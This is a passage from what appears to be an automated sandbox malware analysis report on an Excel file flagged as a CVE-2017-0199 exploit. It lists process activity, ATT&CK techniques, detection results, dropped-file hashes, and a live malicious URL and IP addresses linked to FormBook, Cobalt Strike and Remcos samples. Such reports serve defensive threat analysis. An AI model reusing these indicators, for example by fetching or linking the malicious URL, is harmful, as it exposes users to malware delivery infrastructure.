Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: Document.xla.xlsxStream path 'MBD010681DC/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: Document.xla.xlsxStream path 'Workbook' entropy: 7.99863707372 (max. 8.0)
Source: 9E530000.0.drStream path 'MBD010681DC/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: 9E530000.0.drStream path 'Workbook' entropy: 7.98000171469 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 803Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
2
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Extra Window Memory Injection
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Document.xla.xlsx22%ReversingLabsDocument-Office.Exploit.CVE-2017-0199
Document.xla.xlsx100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood2100%Avira URL Cloudmalware
https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0035.t-0009.t-msedge.net
13.107.246.63
truefalse
    high
    curt.wiz.co.cdn.gocache.net
    170.82.174.30
    truefalse
      high
      curt.wiz.co
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&moodfalse
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood2Document.xla.xlsx, 9E530000.0.drfalse
        • Avira URL Cloud: malware
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        170.82.174.30
        curt.wiz.co.cdn.gocache.netBrazil
        2664443LCLOUDINTERNETSERVICESLTDA-EPPBRfalse
        172.245.123.12
        unknownUnited States
        36352AS-COLOCROSSINGUSfalse
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1576236
        Start date and time:2024-12-16 17:04:09 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 20s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:15
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • GSI enabled (VBA)
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:Document.xla.xlsx
        Detection:MAL
        Classification:mal80.expl.winXLSX@6/30@1/2
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .xlsx
        • Changed system and user locale, location and keyboard layout to French - France
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Active ActiveX Object
        • Active ActiveX Object
        • Active ActiveX Object
        • Active ActiveX Object
        • Scroll down
        • Close Viewer
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe, MavInject32.exe
        • Excluded IPs from analysis (whitelisted): 52.109.28.46, 13.78.111.198, 52.109.32.97, 23.218.208.109, 52.113.194.132, 52.182.141.63, 40.126.53.9, 172.202.163.200, 52.149.20.212, 13.107.246.63
        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, onedscolprdjpe00.japaneast.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, self-events-data.trafficmanager.net, ecs.office.com, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, azureedge-t-prod.trafficmanager.net, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net, uks-azsc-config.officeapps.live.com, onedscolprdcus01.centralus.cloudapp.azure.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtCreateKey calls found.
        • Report size getting too big, too many NtOpenFile calls found.
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtReadFile calls found.
        • Report size getting too big, too many NtReadVirtualMemory calls found.
        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        • VT rate limit hit for: Document.xla.xlsx
        TimeTypeDescription
        11:06:13API Interceptor862x Sleep call for process: splwow64.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        170.82.174.30yGktPvplJn.exeGet hashmaliciousPushdoBrowse
        • www.mqs.com.br/
        a5hbkmGD7N.exeGet hashmaliciousPushdoBrowse
        • www.mqs.com.br/
        9oy0DlGMH9.exeGet hashmaliciousFormBookBrowse
        • www.faunapetsstore.com/o12i/?dT=j6ATUBhxx2glQbP0&2dq=yiHtOwR0aZ7KTWOJuT9hXfachgSHyHMGkjU/6QKzyqsTP1NPRASfxqCAR1p/c7wMh9GXgUQg6w==
        file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
        • www.mqs.com.br/
        file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
        • www.mqs.com.br/
        file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
        • www.mqs.com.br/
        172.245.123.12seemebestgoodluckthings.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
        • 172.245.123.12/361/TELNERA.txt
        PI-02911202409#.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
        • 172.245.123.12/361/TELNERA.txt
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        curt.wiz.co.cdn.gocache.netBG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
        • 170.82.173.30
        Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
        • 170.82.173.30
        Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
        • 170.82.173.30
        Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
        • 170.82.173.30
        Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
        • 170.82.173.30
        NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
        • 170.82.173.30
        Inquiry_0476452.xlsGet hashmaliciousRemcosBrowse
        • 170.82.174.30
        s-part-0035.t-0009.t-msedge.netBG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
        • 13.107.246.63
        JIKJCBEX.exeGet hashmaliciousLummaCBrowse
        • 13.107.246.63
        LKKWDUFD.exeGet hashmaliciousUnknownBrowse
        • 13.107.246.63
        KjECqzXLWp.lnkGet hashmaliciousRHADAMANTHYSBrowse
        • 13.107.246.63
        cey4VIyGKh.lnkGet hashmaliciousRHADAMANTHYSBrowse
        • 13.107.246.63
        NHnfqsj0C4.exeGet hashmaliciousAmadeyBrowse
        • 13.107.246.63
        dZKPE9gotO.exeGet hashmaliciousVidarBrowse
        • 13.107.246.63
        https://qidinfissi.powerappsportals.com/Get hashmaliciousUnknownBrowse
        • 13.107.246.63
        xmas blessing.exeGet hashmaliciousFormBookBrowse
        • 13.107.246.63
        Quote_8722.exeGet hashmaliciousUnknownBrowse
        • 13.107.246.63
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        3LCLOUDINTERNETSERVICESLTDA-EPPBRBG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
        • 170.82.173.30
        Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
        • 170.82.173.30
        Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
        • 170.82.173.30
        Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
        • 170.82.173.30
        Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
        • 170.82.173.30
        NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
        • 170.82.173.30
        yGktPvplJn.exeGet hashmaliciousPushdoBrowse
        • 170.82.174.30
        Inquiry_0476452.xlsGet hashmaliciousRemcosBrowse
        • 170.82.173.30
        AS-COLOCROSSINGUSSample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
        • 192.3.179.166
        Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
        • 192.3.122.159
        Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
        • 23.95.235.29
        Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
        • 192.3.122.159
        Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
        • 23.95.235.29
        Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
        • 23.95.235.29
        Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
        • 192.3.122.159
        givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
        • 192.3.122.159
        clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
        • 192.3.122.159
        sh4.elfGet hashmaliciousUnknownBrowse
        • 107.172.24.189
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        6271f898ce5be7dd52b0fc260d0662b3Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
        • 170.82.174.30
        Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        https://go.eu.sparkpostmail1.com/f/a/IgPiUnQgGsgttR90IQc-hw~~/AAGCxAA~/RgRpOpvrP0QqaHR0cHM6Ly9tYXNzd29vZHBvbGlzaC5pbi93YXRlci9jb2xkL2luZGV4VwVzcGNldUIKZ1XrFlhnca8zKlISemFyZ2FyQGZhcmlkZWEuY29tWAQAAAAB#YmlsbC5ob2l0dEBwYXJ0bmVyc21ndS5jb20=Get hashmaliciousHTMLPhisherBrowse
        • 170.82.174.30
        SLNA_Updated_Medical_Grant_Application(1).docxGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        MHDeXPq2uB.exeGet hashmaliciousRedLineBrowse
        • 170.82.174.30
        No context
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
        Category:dropped
        Size (bytes):118
        Entropy (8bit):3.5700810731231707
        Encrypted:false
        SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
        MD5:573220372DA4ED487441611079B623CD
        SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
        SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
        SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
        Malicious:false
        Reputation:high, very likely benign file
        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):820
        Entropy (8bit):2.7159862044217853
        Encrypted:false
        SSDEEP:24:YIrNyk+vpKAzH5wcfHGFAAJp9WtAZRJ5poIHWI:Ymt+RfzHuc8AAJtfJ52IHV
        MD5:4C216BA54D1A1E057DBD017884BCAE68
        SHA1:04F6A2A122C952A6EE4E54FDB8185D4052074B21
        SHA-256:80AB97552897B6DD6B37DC244018756D8FE893435AA360A26BFF8E6560D81E9C
        SHA-512:1F5F905260B372F9AEE7B6E574F0F427A85F74F30AB90B2CBF7847462A437C8907BDCA33D54260F685AEC64CC53E3241E37A8D6999AB01138C08DB2B39FF7371
        Malicious:false
        Reputation:low
        Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.7.0.0.9.9.8.4.,.3.0.0.4.9.2.6.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.1.1.1.1.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.3.6.4.3.3.7.,.1.0.0.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):153132
        Entropy (8bit):2.766324628026199
        Encrypted:false
        SSDEEP:1536:/yal9Bri6XkRMamXUv6INHOqXbk0WYqEkRARP:/dbIZP
        MD5:970B7DB8B19DC4B20361D42B871D2861
        SHA1:28194CAA9B25A38F3F1FBB224DC2913E1E4EC4FC
        SHA-256:0AF1EB14EE2CEA11DB4D547D2EF5BECABB19C25F7FF5A36EF8A4A350FC998E2E
        SHA-512:DA37677AD2CEA9A020D8F258B425E707FA657AB8EA45CA634F289ABB30B5132E4A1DC671FAE49847A967EADABE7C31A801F4F70589B36C5D81F9B72E63FD6185
        Malicious:false
        Preview:....l...........................Z....G.. EMF....,V..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................&...........................%...........................6.......#.......&...........................%...........L...d...........".......................!...........
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):134544
        Entropy (8bit):2.9527588414114754
        Encrypted:false
        SSDEEP:768:P0WYNNkN2HtS1u40TiTKAvGNLnvfKx4t1cEU9W3V/DOEsx:pYN/Ni0TiTKeYjfKx4tCEU9W35psx
        MD5:83F48FDD46D3424E92E24E709EAB5960
        SHA1:6CEE65663B48B56BDFF6756C38C1F4190EAC6E12
        SHA-256:77F4BCE7FBE1E2F98A04DC51994467460B255135535CDE954EEE8180F500C6AE
        SHA-512:8F781049001FC063EDB9B4352C0EA05D8DA9DCFC599234A58258C6FB4C4CED2B862A701081F10B68E286124413AD04F4AAAB485D376B0A2FB04167AFF121F47E
        Malicious:false
        Preview:....l...............e............n...=.. EMF........6.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f...R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n........................................................@...............8/....X.....8/........................X...................N.8/@....y8/.....m8/|...............|.....................8/.................8/
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):99352
        Entropy (8bit):2.6667732808558338
        Encrypted:false
        SSDEEP:768:hO33v721DW7ohBb66mQK4BTonxqQbApQKyE:U4QE
        MD5:B34CE6999697243BC329F018AB2B5BFB
        SHA1:4080ADDE3DEAD6BB0BEBCE54B29A84E6869760FB
        SHA-256:D553E2A248074EC3637714FCAC2B5F08B5DFC8CC91B507531BA6815CC98561F7
        SHA-512:4040406ED3CAD0986F54BE748F335A7FA87DC96471E7D6E9E4E2F3BBF3BE2ED2B7559AEA13783D0AF691A4A6F0F0B5159D96B3407192F08A0E0DD5521E19D48B
        Malicious:false
        Preview:....l............................}...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):98872
        Entropy (8bit):2.6701876757005008
        Encrypted:false
        SSDEEP:768:XOJzQvEG1DW7ohBb66mQK4BTonxqQbApQKyE:+MQE
        MD5:40AC38D8DC50704F5FCE17EA2E9E768F
        SHA1:B05BAE53504CF4D02060EACAE25A81290E9ED6BF
        SHA-256:726653ABCBF5091114837027AA88466315D7E86652B22BE58A178F3260681DB7
        SHA-512:70E958B694086B2CAE86FD9C2CA919C48B6F88AE9DC8F5005FF3A2F41782D1C15C08B2BCAFEDA6351D1AB3192FC1D47FE0526B320B03267D9E6EE924CB8BF567
        Malicious:false
